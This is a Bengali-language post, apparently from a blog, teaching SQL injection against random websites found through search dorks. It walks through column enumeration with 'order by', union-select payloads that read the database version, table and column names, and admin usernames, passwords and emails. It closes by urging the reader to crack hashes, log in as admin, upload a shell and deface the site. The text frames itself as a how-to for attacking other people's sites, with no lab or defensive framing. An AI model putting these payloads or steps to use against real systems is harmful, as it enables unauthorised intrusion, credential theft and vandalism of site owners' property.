হ্যাকিং পদ্ধতি গুলোর মধ্যে সবচেয়ে কার্যকর পদ্ধতি হচ্ছে
SQLi Injection.
এই পদ্ধতিতে
হ্যাকিং এর জন্য প্রথমে dork ব্যবহার করে SQLi vulnerable সাইট খুঁজে বের করতে হবে।
SQLi এর Dork এখানে।
আপনি যেকোনো dork ব্যবহার করতে পারেন, আপনার পছন্দ মতো।
ধরুন আমরা index.php?id= এই Dork টি নিলাম।
সার্চ ফলাফল থেকে
যেকোনো একটি সাইট নিয়ে তা পরীক্ষা করবো যে তা SQLi vulnerable কিনা।
মনেকরি, www.example.com/index.php?id=xx
এই সাইট টি নিলাম।
এখন সাইটটির vulnerabilities পরীক্ষার জন্য xx এর আগে অথবা পরে ‘ Sign টি দিয়ে ওকে করলে যদি
এখন সাইটটির কলাম
সংখ্যা বের করতে হবে। এজন্য লিখবো
www.example.com/index.php?id=xx
order by 1 - -
অর্থাৎ xx এর পর শুধু order by 1 - - যোগ করবো। এখানে 1 হচ্ছে কলাম সংখ্যা।
(যারা মোবাইল
থেকে করবেন তারা space এর বদলে + দিবেন)
যদি এতে কোন error না দেয় তবে লিখবো
www.example.com/index.php?id=xx
order by 2 - - দিবো।
এভাবে কলাম
সংখ্যা বৃদ্ধি করে অর্থাৎ 1,2,3,3,4,5…………… দিয়ে দেখতে থাকবো কোনটিতে error দেয়।
যখন order clause 500 এমন error দিবে তখন থামবো।
ধরুন কলাম সংখ্যা
6 এ উপরের মত error দিলো তাহলে বুঝতে হবে এর কলাম সংখ্যা 5 .
কলাম সংখ্যা
পেলাম। এবার বের করবো কোন কলামটি vulnerable.
এর জন্য xx এর পর union select all ক্রমানুসারে কলাম সংখ্যা – লিখবো এবং xx এর আগে – sign টি দিবো। তাহলে লিঙ্কটি হবে
www.example.com/index.php?id=-xx union select all 1,2,3,4,5,6--
এখন ওয়েবপেজে
কলাম সংখ্যার মধ্যে যে সংখ্যা গুলো দেখা যাবে তাই vulnerable কলাম।
একাধিক সংখ্যা
দেখালে যেটি deep বা bold
বা colord হবে সেটি নিবো।
ধরি উপরের সাইটটির ক্ষেত্রে কলাম সংখ্যা পেলাম 5 .
তাহলে 5 নম্বর কলামটির database version বের করবো।
তার জন্য লিখবো
www.example.com/index.php?id=-xx
union select all 1,2,3,4,@@version,6- -
অর্থাৎ শুধু মাত্র 5 এর জায়গায় @@version লিখবো।
এখন দেখা যাবে ওয়েবপেজ এর যেই জায়গায় 5
লিখা আসছিল সেখানে
database version (5.xx.xx -log) দেখাবে। যদি database version 5 হয় তাহলে continue করব, অন্যথায় সাইটটি বাদ দিবো। কারন এই পদ্ধতিটি database version 5 এর জন্য।
ধরে নেই database version 5 পাওয়া গেছে।
এবার সাইটটির টেবিল সংখ্যা বের করবো তার জন্য লিখবো
www.example.com/index.php?id=-xx
union select all 1,2,3,4,group_concat(table_name),6 from
information_schema.tables where table_schema=database()- -
ফলে যেইখানে database version লিখা আসছিলো, সেখানে টেবিল নাম আসবে
নিচের মত...
এখান থেকে অনুমান করতে হবে কোন টেবিলটিতে ইউজার নাম এবং password থাকতে পারে।
উপরের টেবিল গুলোর মধ্যে admin টেবিলটি দেখে
সহজেই বুঝা যায় যে admin এর মধ্যে username & password থাকতে পারে।
এখন admin টেবিল নামকে explore করে কলাম নাম বের করবো। এজন্য লিখবো
www.example.com/index.php?id=-xx
union select all 1,2,3,4,group_concat(column_name),6 from
information_schema.columns where table_name=0xhex code of admin- -
*** admin এর হেক্স কোড
বের করবো
এখন কলাম নাম পাবো নিচের মতো...
কলাম নাম থেকে username & password বের করতে লিখবো
www.example.com/index.php?id=-xx
union select all 1,2,3,4,group_concat((id,0x3a,user,0x3a,pass,0x3a,email),6
from যে টেবিল থেকে কলাম নাম পেয়েছি তার নাম - -
এখন নিচের মতো দেখাবে।
ব্যস পেয়ে গেলেন username & password .
( password যদি Hash কোডে বের হয় তাহলে Hash
decrypte করুন এখান থেকে। )
Username & password দিয়ে সাইটটিতে
লগইন করতে দরকার admin panel.
সাইটটির এডমিন প্যানেল বের করুন ।
এডমিন প্যানেল পেয়ে গেলে লগইন করুন এবং সাইটে shell upload করে deface করুন।







0 comments:
Post a Comment